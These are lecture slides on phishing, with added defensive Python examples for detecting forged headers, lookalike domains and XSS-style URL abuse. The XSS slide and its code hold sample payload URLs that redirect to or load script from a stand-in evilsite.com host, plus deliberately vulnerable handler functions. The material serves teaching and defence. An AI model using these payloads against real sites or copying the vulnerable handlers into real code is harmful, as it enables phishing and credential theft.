Phishing
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh

About me
- Currently a Lecturer in this department (for 351 days at the time of writing)
- Former Research Intern in the M3C Laboratory, University of Bolton, UK

For you
- Email me at rushdecoder@yahoo.com if you want
- My homepage and course materials are at http://rushdishams.googlepages.com
- You need to join http://groups.google.com/group/csebatchesofrushdi
Phishing
- The number of unique e-mail-based fraud attacks detected in November 2005 was 16,882, almost double the 8,975 attacks launched in November 2004, said the report (Anti-Phishing Working Group)
- Phishing e-mails pretend to come from legitimate companies, such as banks and e-commerce sites
- They are used by criminals to try to trick Web users into revealing personal information and account details

Phishing
- The number of brands targeted increased by nearly 50 percent over the course of 2005, from 64 in November 2004 to 93 in November 2005
- "One big attack will temporarily hurt a brand, but the increase in e-commerce is not slowing down." (Mark Murtagh, Websense technical director)

Phishing
- Top brands continue to be hijacked, with phishers using established names to try to lure people to their sites
- eBay is often spoofed, for obvious reasons
- Google is increasingly being targeted because of its expansion into different business application models
- The big banking names are used too: HSBC, Citigroup, Lloyds, all the major brands

Phishing
- There's no point in using local names if the attack is global
- Attacks are becoming increasingly sophisticated
- Web sites are hosting keylogging malicious software
- Before, people had to click on a site to download malicious code
- If they thought a web site looked 'phishy', they could leave and probably not be harmed
- Now, with most phishing sites they just have to

Phishing
- Twenty-five percent of those sites now host keylogging code
- If you visit one you will probably open yourself to identity theft or fraud
Exploiting the Weakness
- Why is it that crooks are able to mount an attack?
- What are the weaknesses that they exploit?
- Richness of functionality: complex systems can have program bugs
- Increasing interconnectivity: separate functions of any system are combined and interconnected via the Internet

Exploiting the Weakness
- Expanding market in exploits: very little technical skill is required, because ready-made attack tools are impressive and cheap
- The scale of content-based attacks: everyone uses e-mail and e-mail is exploitable, so why not?
Social Engineering Factors
- Phishing attacks rely upon a mix of technical deceit and social engineering practices
- In the majority of cases the phisher must persuade the victim
- The victim then intentionally performs a series of actions that provide access to confidential information

Social Engineering Factors
- Communication channels such as email, web pages, IRC and instant messaging services are popular
- The phisher must impersonate a trusted source (e.g. the helpdesk of the victim's bank, an automated support response from their favourite online retailer, etc.) for the victim to believe the message
Phishing Techniques
- Phishing attacks initiated by email are the most common
- Using networks of Trojaned hosts, phishers can deliver specially crafted emails to millions of legitimate "live" email addresses within a few hours
- Sometimes phishers purchase lists of e-mail addresses

Phishing Techniques
- SMTP performs no authentication of the sender, so phishers are able to create emails with forged "Mail From:" (envelope sender) and "From:" headers and impersonate any organisation they choose
- Any customer replies to the phishing email will be sent to an address the phisher controls (for example via a "Reply-To:" header), not to the impersonated organisation

Phishing Techniques
- Official-looking and official-sounding emails
- Copies of legitimate corporate emails with minor URL changes
- HTML-based email used to obfuscate target URL information
- Standard virus/worm attachments to emails

Phishing Techniques
- A plethora of anti-spam-detection inclusions
- Crafting of "personalised" or unique email messages
- Fake postings to popular message boards and mailing lists
- Use of fake "Mail From:" addresses and open mail relays to disguise the source of the email
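The two e-mail tricks above (a sender the SMTP path never verifies, and HTML anchor text that names one URL while the href points somewhere else) can be checked mechanically. The following is an added example, not code from the deck or from the Phishing Guide it draws on. The message it parses is constructed here using reserved example domains; the brand "mybank.example" and the lookalike host are assumptions.

```python
"""Header and HTML-link checks for a suspected phishing e-mail (added example)."""
import re
from email import policy
from email.parser import BytesParser
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample message. Return-Path is what the receiving MTA recorded
# from the SMTP envelope; From: and Reply-To: are header fields chosen by the
# sender. Plain SMTP authenticates none of them.
SAMPLE = b"""Return-Path: <bounce@mail-relay.example.net>
From: MyBank Helpdesk <helpdesk@mybank.example>
Reply-To: support@mybank-verify.example.org
To: customer@example.com
Subject: Please confirm your account
Content-Type: text/html; charset="us-ascii"

<html><body>
<p>Please log in at
<a href="http://mybank.example.userdll.example.org:4903/ib/index.htm">https://olb.mybank.example/ib/default.asp</a>
</p></body></html>
"""


def _domain(addr: str) -> str:
    """Lower-cased domain part of an address such as '<user@host>'."""
    return addr.rsplit("@", 1)[-1].strip("<> ").lower()


class _Links(HTMLParser):
    """Collect (href, visible text) for every <a> element in the body."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def analyse(raw: bytes) -> list:
    """Return human-readable findings for one RFC 5322 message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []

    # 1. Does the envelope sender or the reply address leave the From: domain?
    from_dom = _domain(msg["From"].addresses[0].addr_spec)
    for hdr in ("Return-Path", "Reply-To"):
        if msg[hdr]:
            d = _domain(str(msg[hdr]))
            if d != from_dom:
                findings.append("%s domain %s differs from From domain %s"
                                % (hdr, d, from_dom))

    # 2. Does any link whose visible text is itself a URL point elsewhere?
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        parser = _Links()
        parser.feed(body.get_content())
        for href, text in parser.links:
            if re.match(r"https?://", text):
                shown, real = urlsplit(text).hostname, urlsplit(href).hostname
                if shown != real:
                    findings.append("link text shows %s but href goes to %s"
                                    % (shown, real))
    return findings


if __name__ == "__main__":
    for line in analyse(SAMPLE):
        print(line)
```

The header comparisons are heuristics: mailing lists and bulk-mail providers legitimately use a Return-Path on their own domain. The authoritative control is SPF, DKIM and DMARC as evaluated by the receiving MTA (visible in its Authentication-Results header); the anchor-text-versus-href check, on the other hand, has no benign explanation and is the single most reliable sign of the technique on these slides.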
A real-life phishing example

Things to note
- The email was sent in HTML format
- Lower-case L's have been replaced with upper-case I's. This is used to help bypass many standard anti-spam filters that match on the bank's domain name

Things to note
- Within the HTML-based email, the link text https://oIb.westpac.com.au/ib/defauIt.asp in fact points to an escape-encoded version of the following URL: http://olb.westpac.com.au.userdll.com:4903/ib/index.htm
- Note that the registered domain of that host is userdll.com; "olb.westpac.com.au" is only a subdomain prefix chosen to look like the bank's hostname

Things to note
- The non-standard HTTP port of 4903 can be attributed to the fact that the phisher's fake site was hosted on a third-party PC that had previously been compromised by an attacker

Things to note
- Recipients that clicked on the link were then forwarded to the real Westpac application
- However, a JavaScript popup window containing a fake login page was presented

Things to note
- This fake login window was designed to capture and store the recipient's authentication credentials
- The JavaScript also submitted the authentication information to the real Westpac application, so the login still appeared to succeed
Where are they standing now?
- The inclusion of HTML-disguised links
- The use of third-party-supplied, or fake, banner advertising graphics to lure customers
- The use of web bugs (hidden items within the page, such as a zero-sized graphic) to track a potential customer
- The use of pop-up or frameless windows to disguise the true source of the phisher's message

Where are they standing now?
- Embedding malicious content within the viewable web page
- This installs software of the phisher's choice (e.g. key-loggers, screen-grabbers, back-doors and other Trojan horse programs)

Banner Advertising
IRC and IM
- New on the phisher's radar, IRC and Instant Messaging (IM) forums are likely to become a popular phishing ground
- The common usage of bots (automated programs that listen and participate in group discussions) in many of the popular channels,

Trojan Hosts
- The delivery source is increasingly becoming home PCs that have previously been compromised
- A Trojan horse program has been installed which allows phishers (along with spammers, warez pirates, DDoS bots, etc.) to use the PC as a message propagator
- Tracking back a phishing attack to the individual criminal who initiated it is therefore extremely difficult

Trojan Hosts
- The installation of Trojan horse software is on the increase, despite the efforts of large anti-virus companies
- Phishers operate large networks of Trojan deployments (networks consisting of thousands of hosts are not uncommon)
- Phishers must be selective about the information they wish to record or be faced with information overload
Information Specific Trojans
- You have come across a file named JavaUtil.zip
- But you forgot that "Hide extensions for known file types" is enabled in your Windows folder settings
- Hmm, so JavaUtil.zip may really be an .exe file whose full name is JavaUtil.zip.exe
- You, unfortunately, double-click that "zip" file to unzip it
- You are doomed!

Information Specific Trojans
- Early in 2004, a phisher created a custom key-logger Trojan
- The Trojan key-logger was designed specifically to capture all key presses within windows whose titles contained various names, including: commbank, Commonwealth, NetBank, Citibank, Bank of America, e-gold, e-bullion, e-Bullion, evocash, EVOCash, EVOcash, intgold, INTGold, paypal, PayPal, bankwest, Bank West, BankWest, National Internet Banking, cibc, CIBC, scotiabank and ScotiaBank
Phishing Attack Vectors
- Man-in-the-middle attacks
- URL obfuscation attacks
- Cross-site scripting attacks
- Preset session attacks

Man in the Middle Attacks
- The attacker situates themselves between the customer and the real web-based application, and proxies all communications between the systems
- This form of attack is successful for both HTTP and HTTPS communications
- The customer connects to the attacker's server as if it were the real site
- The attacker's server makes a simultaneous connection to the real site

Man in the Middle Attacks
- The attacker's server then proxies all communications between the customer and the real web-based application server
- In the case of secure HTTPS communications, an SSL connection is established between the customer and the attacker's proxy
- while the attacker's proxy creates its own SSL connection between itself and the real server
- Caveat: the proxy cannot present a certificate that is valid for the real site's hostname unless it holds one trusted by the victim's browser for that name. In practice the attacker either lures the victim to a lookalike hostname for which they hold a legitimate certificate, or relies on the victim clicking through the browser's certificate warning

Man in the Middle Attacks
- The attacker must be able to direct the customer to their proxy server instead of the real server
- This may be carried out through a number of methods:
  - Transparent proxies
  - DNS cache poisoning
  - URL obfuscation

Transparent Proxies
- Situated on the same network segment as the customer, or located on the route to the real server
- A transparent proxy service can intercept all data by forcing all outbound HTTP and HTTPS traffic through itself

DNS Cache Poisoning
- Can be used to disrupt normal traffic routing by injecting false IP addresses for key domain names
- E.g. the attacker poisons the DNS cache of a network firewall or resolver so that all lookups for the MyBank hostname now resolve to the attacker's proxy server IP address
URL Obfuscation
- The attacker tricks the customer into connecting to their proxy server instead of the real server
- The customer may follow a link to one of:
  http://privatebanking.mybank.com.ch (the registered domain is under .com.ch, not mybank.com)
  http://mybank.privatebanking.com (the brand name appears only as a subdomain of privatebanking.com)
  http://privatebanking.mybonk.com (a typo-squatted domain)
  http://privatebanking.mybánk.com (an internationalised domain name with an accented character)
  http://privatebanking.mybank.hackproof.com (the brand name as a subdomain of hackproof.com)
- And the real one is http://privatebanking.mybank.com
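Every host on the slide above, and the Westpac link in the real-life example earlier, fails the same test: the part of the hostname that the registrant actually controls is not the brand's domain. The following is an added example, not code from the deck or from the Phishing Guide, that applies that test and also flags the other tricks in the Westpac link (percent-encoded target, non-standard port, capital I in place of lower-case l). Two assumptions are labelled in the code: the small PUBLIC_SUFFIXES set stands in for the real Public Suffix List, and the percent-encoded form of the Westpac URL is constructed here, since the deck only says the link was escape-encoded.

```python
"""Tell a brand's real domain from a lookalike link (added example)."""
from urllib.parse import unquote, urlsplit

# Assumption: a tiny stand-in for publicsuffix.org. Load the full list in practice.
PUBLIC_SUFFIXES = {"com", "net", "org", "ch", "au", "com.au", "co.uk"}


def registrable_domain(host: str) -> str:
    """Return the part of a hostname that one registrant controls.

    'olb.westpac.com.au.userdll.com' -> 'userdll.com'; the westpac labels to
    the left are just subdomains the owner of userdll.com chose.
    """
    labels = host.split(".")
    for i in range(1, len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return host


def inspect_link(url: str, brand_domain: str) -> dict:
    """Decode a link the way a browser would and compare it with brand_domain."""
    parts = urlsplit(url)
    # The host exactly as written (case preserved) to spot the I-for-l trick.
    raw_host = parts.netloc.rsplit("@", 1)[-1].rsplit(":", 1)[0]
    # What the browser connects to: percent-decoded and lower-cased.
    host = unquote(parts.hostname or "")
    findings = []
    if "I" in raw_host:
        findings.append("capital I in host; reads %s after I->l"
                        % raw_host.replace("I", "l").lower())
    if any(ord(c) > 127 for c in host):
        findings.append("non-ASCII host, IDNA form %s"
                        % host.encode("idna").decode("ascii"))
    if parts.port not in (None, 80, 443):
        findings.append("non-standard port %d" % parts.port)
    reg = registrable_domain(host)
    if reg != brand_domain:
        findings.append("registrable domain is %s, not %s" % (reg, brand_domain))
    return {"host": host, "registrable": reg,
            "belongs_to_brand": reg == brand_domain, "findings": findings}


# The five lookalikes from the URL Obfuscation slide.
LOOKALIKES = [
    "http://privatebanking.mybank.com.ch",
    "http://mybank.privatebanking.com",
    "http://privatebanking.mybonk.com",
    "http://privatebanking.mybánk.com",
    "http://privatebanking.mybank.hackproof.com",
]

# The Westpac example: the text the victim saw, and a constructed
# percent-encoded form of the href it actually carried.
WESTPAC_TEXT = "https://oIb.westpac.com.au/ib/defauIt.asp"
WESTPAC_HREF = "http://%6Fl%62.westpac.com.au.userdll.com:4903/ib/index.htm"

if __name__ == "__main__":
    for u in LOOKALIKES + ["http://privatebanking.mybank.com"]:
        print(u, inspect_link(u, "mybank.com"))
    print(WESTPAC_TEXT, inspect_link(WESTPAC_TEXT, "westpac.com.au"))
    print(WESTPAC_HREF, inspect_link(WESTPAC_HREF, "westpac.com.au"))
```

Note what the Westpac case shows: the visible text does resolve to the bank's registrable domain (after undoing the I-for-l swap), because its purpose was to look right to the reader and to evade filters, while the href it hid is what actually has to be inspected. The capital-I check is a heuristic, since DNS is case-insensitive and some legitimate links are mixed case; the registrable-domain comparison is the decisive test.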
Third party shortened URL
Cross Site Scripting (XSS)
- Makes use of custom URL or code injection into a valid web-based application URL
- The result of poor web-application development practices: untrusted input placed into a page, a redirect or a script reference without validation or encoding

Cross Site Scripting (XSS)
- Full HTML substitution, such as:
  http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm
  (strictly an open-redirect or content-substitution flaw rather than script injection, but abused the same way: the victim sees a trusted mybank.com URL)
- Inline embedding of scripting content, such as:
  http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode
- Forcing the page to load external scripting code, such as:
  http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2
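The three URL patterns above correspond to three server-side mistakes. The following is an added example, not code from the deck or from the Phishing Guide: for each pattern, the vulnerable handling of the query parameter sits beside a hardened version. Plain functions over the query string stand in for a web framework, the allowed redirect hosts and known script names are assumptions for illustration, and the treatment of "!" in the third pattern is an assumed separator, since the slide does not say how the original application parsed it.

```python
"""Vulnerable and hardened handling of the three URL patterns (added example)."""
import html
from urllib.parse import parse_qs, urlsplit

# Assumption: hosts the application may redirect to.
ALLOWED_REDIRECT_HOSTS = {"mybank.com", "www.mybank.com"}
# Assumption: the only scripts a page may reference by name.
KNOWN_SCRIPTS = {"ebanking.js", "menu.js"}


def _param(query: str, name: str) -> str:
    """First value of a query-string parameter, percent-decoded; '' if absent."""
    return parse_qs(query).get(name, [""])[0]


# 1. Full HTML substitution: ?URL=http://evilsite.com/phishing/fakepage.htm
def redirect_target_vulnerable(query: str) -> str:
    # Sends the browser wherever the attacker's link says.
    return _param(query, "URL")


def redirect_target_hardened(query: str) -> str:
    target = _param(query, "URL")
    parts = urlsplit(target)
    # A relative path on this site. '//evil' is protocol-relative and is
    # rejected because urlsplit gives it a netloc.
    if (not parts.scheme and not parts.netloc
            and target.startswith("/") and not target.startswith("//")):
        return target
    # An absolute URL only over https and only to an allow-listed host.
    if parts.scheme == "https" and parts.hostname in ALLOWED_REDIRECT_HOSTS:
        return target
    return "/"  # anything else (javascript:, other hosts) falls back home


# 2. Inline embedding: ?page=1&client=<SCRIPT>evilcode
def render_vulnerable(query: str) -> str:
    # Reflects the parameter straight into the HTML, so markup executes.
    return "<p>Welcome, %s</p>" % _param(query, "client")


def render_hardened(query: str) -> str:
    # HTML-encodes the parameter, so <SCRIPT> is shown as inert text.
    return "<p>Welcome, %s</p>" % html.escape(_param(query, "client"), quote=True)


# 3. External script reference: ?response=evilsite.com%21evilcode.js
def script_tag_vulnerable(query: str) -> str:
    # Builds a <script src> from the parameter; '%21' decodes to '!', assumed
    # here to be the application's host/file separator.
    src = _param(query, "response").replace("!", "/")
    return '<script src="http://%s"></script>' % src


def script_tag_hardened(query: str) -> str:
    # Only a bare filename from a fixed set, served from this site's own path.
    name = _param(query, "response")
    if name not in KNOWN_SCRIPTS:
        name = "ebanking.js"
    return '<script src="/static/%s"></script>' % name


if __name__ == "__main__":
    q1 = "URL=http://evilsite.com/phishing/fakepage.htm"
    q2 = "page=1&client=<SCRIPT>evilcode"
    q3 = "page=1&response=evilsite.com%21evilcode.js&go=2"
    print(redirect_target_vulnerable(q1), "->", redirect_target_hardened(q1))
    print(render_vulnerable(q2), "->", render_hardened(q2))
    print(script_tag_vulnerable(q3), "->", script_tag_hardened(q3))
```

The common thread is that each hardened version decides what the parameter is allowed to be (a local path or an allow-listed host, inert text, a known filename) instead of trying to recognise what an attacker might send; a Content-Security-Policy header that limits script sources adds a second layer for the last two cases.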
Preset Session Attack

Hidden Frame

Graphical Substitution
References
- The Phishing Guide by Next Generation Security Software Limited

Related Papers
- Technical Trends in Phishing Attacks by Jason Milletary
- Why Phishing Works by Dhamija et al.